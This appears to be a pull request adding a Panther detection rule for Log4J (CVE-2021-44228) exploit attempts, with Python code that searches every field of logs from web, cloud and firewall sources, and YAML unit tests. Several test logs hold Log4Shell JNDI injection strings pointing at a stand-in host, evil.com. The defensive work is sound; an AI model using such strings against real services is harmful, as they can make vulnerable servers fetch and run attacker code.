### PR TITLE
Create Detection for log4j exploit

### DIFF
--- a/panther_ioc_rules/log4j_exploit_iocs.py
+++ b/panther_ioc_rules/log4j_exploit_iocs.py
@@ -19,3 +19,7 @@ def rule(event):
         if nested_value_search(event_dict, ioc):
             return True
     return False
+
+
+def title(event):
+    return f"Log4J exploit attempt detected in log source {event.get('p_log_type')}"

--- a/panther_ioc_rules/log4j_exploit_iocs.py
+++ b/panther_ioc_rules/log4j_exploit_iocs.py
@@ -1,11 +1,10 @@
-from panther_analysis_tool.immutable import ImmutableList
 from panther_iocs import LOG4J_EXPLOIT_IOCS
 
 
 def nested_value_search(data, search_value):
     if not hasattr(data, "__iter__"):
         return False
-    if isinstance(data, ImmutableList):
+    if isinstance(data, list):
         return any(nested_value_search(item, search_value) for item in data)
 
     if isinstance(data, dict):
@@ -15,7 +14,7 @@ def nested_value_search(data, search_value):
 
 
 def rule(event):
-    event_dict = dict(event)
+    event_dict = event.to_dict()
     for ioc in LOG4J_EXPLOIT_IOCS:
         if nested_value_search(event_dict, ioc):
             return True

--- a/panther_ioc_rules/log4j_exploit_iocs.py
+++ b/panther_ioc_rules/log4j_exploit_iocs.py
@@ -1,0 +1,22 @@
+from panther_analysis_tool.immutable import ImmutableList
+from panther_iocs import LOG4J_EXPLOIT_IOCS
+
+
+def nested_value_search(data, search_value):
+    if not hasattr(data, "__iter__"):
+        return False
+    if isinstance(data, ImmutableList):
+        return any(nested_value_search(item, search_value) for item in data)
+
+    if isinstance(data, dict):
+        return any(nested_value_search(v, search_value) for v in data.values())
+
+    return search_value in data
+
+
+def rule(event):
+    event_dict = dict(event)
+    for ioc in LOG4J_EXPLOIT_IOCS:
+        if nested_value_search(event_dict, ioc):
+            return True
+    return False

--- a/panther_ioc_rules/log4j_exploit_iocs.yml
+++ b/panther_ioc_rules/log4j_exploit_iocs.yml
@@ -1,0 +1,76 @@
+AnalysisType: rule
+Filename: log4j_exploit_iocs.py
+RuleID: IOC.Log4jExploit
+DisplayName: Log4J Exploit IOC Search
+Enabled: True
+LogTypes:
+  - AWS.ALB
+  - AWS.CloudTrail
+  - AWS.S3ServerAccess
+  - AWS.VPCFlow
+  - Apache.AccessCombined
+  - Apache.AccessCommon
+  - Cloudflare.Firewall
+  - Cloudflare.HttpRequest
+  - Fastly.Access
+  - GCP.AuditLog
+  - Juniper.Access
+  - Juniper.Firewall
+  - Nginx.Access
+  - Syslog.RFC3164
+  - Syslog.RFC5424
+
+Tags:
+  - AWS
+  - GCP
+  - Web
+  - Log4J
+Severity: Critical
+Description: >
+  Monitors for potential exploit attempts agains CVE-2021-44228, Log4J remote code execution
+Reference: >
+  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
+Runbook: >
+  Investigate exploit attempt event content to determine scope and type of exploitation. Patch Log4J to the latest patched version
+SummaryAttributes:
+  - p_any_domain_names
+  - p_any_ipaddresses
+
+Tests:
+  -
+    Name: Exploit Detected in Event (String)
+    ExpectedResult: true
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "${jndi:ldap://evil.com/shell.php}"
+      }
+
+  -
+    Name: Exploit Detected in Event (List)
+    ExpectedResult: true
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "['${jndi:nis://evil.com/shell.php}', 'foobar']"
+      }
+  -
+    Name: Exploit Detected in Event (Dict)
+    ExpectedResult: true
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "{'foo':'${jndi:ldap://evil.com/shell.php}', 'bar':'baz'}"
+      }
+  -
+    Name: No Exploit found
+    ExpectedResult: false
+    Log:
+      {
+        "src_addr": "10.10.10.123",
+        "dst_addr": "10.10.10.124",
+        "payload" : "Nothing to see here"
+      }

--- a/panther_ioc_rules/log4j_exploit_iocs.yml
+++ b/panther_ioc_rules/log4j_exploit_iocs.yml
@@ -19,7 +19,6 @@ LogTypes:
   - Nginx.Access
   - Syslog.RFC3164
   - Syslog.RFC5424
-
 Tags:
   - AWS
   - GCP
@@ -35,7 +34,6 @@ Runbook: >
 SummaryAttributes:
   - p_any_domain_names
   - p_any_ipaddresses
-
 Tests:
   -
     Name: Exploit Detected in Event (String)
@@ -44,7 +42,8 @@ Tests:
       {
         "src_addr": "10.10.10.123",
         "dst_addr": "10.10.10.124",
-        "payload" : "${jndi:ldap://evil.com/shell.php}"
+        "payload" : "${jndi:ldap://evil.com/shell.php}",
+        "p_log_type": "AWS.ALB"
       }
 
   -
@@ -54,7 +53,8 @@ Tests:
       {
         "src_addr": "10.10.10.123",
         "dst_addr": "10.10.10.124",
-        "payload" : "['${jndi:nis://evil.com/shell.php}', 'foobar']"
+        "payload" : "['${jndi:nis://evil.com/shell.php}', 'foobar']",
+        "p_log_type": "AWS.ALB"
       }
   -
     Name: Exploit Detected in Event (Dict)
@@ -63,8 +63,8 @@ Tests:
       {
         "src_addr": "10.10.10.123",
         "dst_addr": "10.10.10.124",
-        "payload" : [7, "nothing to declare", {"foo": "${jndi:ldap://evil.com/shell.php}", "bar": "baz"}]
-
+        "payload" : [7, "nothing to declare", {"foo": "${jndi:ldap://evil.com/shell.php}", "bar": "baz"}],
+        "p_log_type": "AWS.ALB"
       }
   -
     Name: No Exploit found

--- a/panther_ioc_rules/log4j_exploit_iocs.yml
+++ b/panther_ioc_rules/log4j_exploit_iocs.yml
@@ -63,7 +63,8 @@ Tests:
       {
         "src_addr": "10.10.10.123",
         "dst_addr": "10.10.10.124",
-        "payload" : {"foo": "${jndi:ldap://evil.com/shell.php}", "bar": "baz"}
+        "payload" : [7, "nothing to declare", {"foo": "${jndi:ldap://evil.com/shell.php}", "bar": "baz"}]
+
       }
   -
     Name: No Exploit found

--- a/panther_ioc_rules/log4j_exploit_iocs.yml
+++ b/panther_ioc_rules/log4j_exploit_iocs.yml
@@ -63,7 +63,7 @@ Tests:
       {
         "src_addr": "10.10.10.123",
         "dst_addr": "10.10.10.124",
-        "payload" : "{'foo':'${jndi:ldap://evil.com/shell.php}', 'bar':'baz'}"
+        "payload" : {"foo": "${jndi:ldap://evil.com/shell.php}", "bar": "baz"}
       }
   -
     Name: No Exploit found


### PR DESCRIPTION
### Background
This rule will search ALL FIELDS in the log sources defined in the yaml. This is needed because the exploit can be injected into a ton of fields, headers, etc. Casting a wide net but the strings are oddball enough that I think the False positive rate should be low


### Changes

* Create log4j exploit rule and tests

### Testing

CI/CD and Unit tests
